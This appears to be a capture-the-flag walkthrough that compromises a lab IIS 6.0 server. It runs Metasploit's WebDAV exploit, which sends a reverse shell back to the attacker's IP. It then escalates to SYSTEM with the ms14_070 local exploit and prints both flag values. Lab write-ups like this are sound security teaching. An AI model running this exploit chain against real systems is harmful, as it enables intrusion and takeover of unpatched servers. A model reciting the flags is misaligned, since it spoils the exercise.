As usual let's start with nmap:
nmap -sV -sC 10.129.95.233
Port 80 is open, so let's check the website. Open your browser and enter 10.129.95.233 in the URL bar.
Let's do a HEAD request with curl to get more info about the server:
curl -I 10.129.95.233
The Server header tells us the web server is Microsoft-IIS/6.0, which is very old and has known remote code execution bugs.
I googled "IIS6 exploit" and found this article from Rapid7:
Let's follow the steps in the article.
First, open a new terminal and load Metasploit:
msfconsole
As per the article let's type:
use exploit/windows/iis/iis_webdav_scstoragepathfromurl
show options
We need to set LHOST and RHOSTS, which are required options.
LHOST (local host) is the IP of your own machine, where the reverse shell will connect back to. If you don't know your IP, you can find it with ifconfig. My machine's IP is 10.10.14.21; yours will be different.
set LHOST 10.10.14.21
RHOSTS (remote hosts) is the target machine's IP:
set RHOSTS 10.129.95.233
exploit
It worked!
shell
whoami
We are NT AUTHORITY\NETWORK SERVICE.
Great!
That is a low-privileged account, though, so we need to escalate our privileges.
Type exit to leave the command shell and return to the meterpreter prompt:
exit
Privilege Escalation
Let's use Lester, the Local Exploit Suggester. Lester is a post module that scans the target for local privilege escalation vulnerabilities. It does not exploit them; it only reports which local exploit modules are likely to work. It needs an existing session on the target, which we already have, so let's try it.
run post/multi/recon/local_exploit_suggester
We get several candidate exploits; let's pick exploit/windows/local/ms14_070_tcpip_ioctl.
Before running it, let's see what processes are running on the target machine:
ps
We want to migrate into a process running as NT AUTHORITY\NETWORK SERVICE (the same user as our session), so the local exploit runs from a more stable process than the IIS worker the WebDAV exploit landed us in.
Let's pick davcdata.exe. Meterpreter's ps can filter on the process name with a regex:
ps -S dav
The process ID for davcdata.exe is PID 2768.
Let's migrate to this process:
migrate 2768
background
Meterpreter prints the session number when it backgrounds; here it is session 1.
use exploit/windows/local/ms14_070_tcpip_ioctl
set SESSION 1
show options
set LHOST 10.10.14.21
exploit
It worked! We now have a new meterpreter session running as SYSTEM. Drop into a shell and grab the flags:
shell
cd C:\Documents and Settings\Harry\Desktop
dir
type user.txt
bdff5ec67c3cff017f2bedc146a5d869
Congratulations! You found the user flag!
cd C:\Documents and Settings\Administrator\Desktop
dir
type root.txt
9359e905a2c35f861f6a57cecf28bb7b
Congratulations! You found the root flag!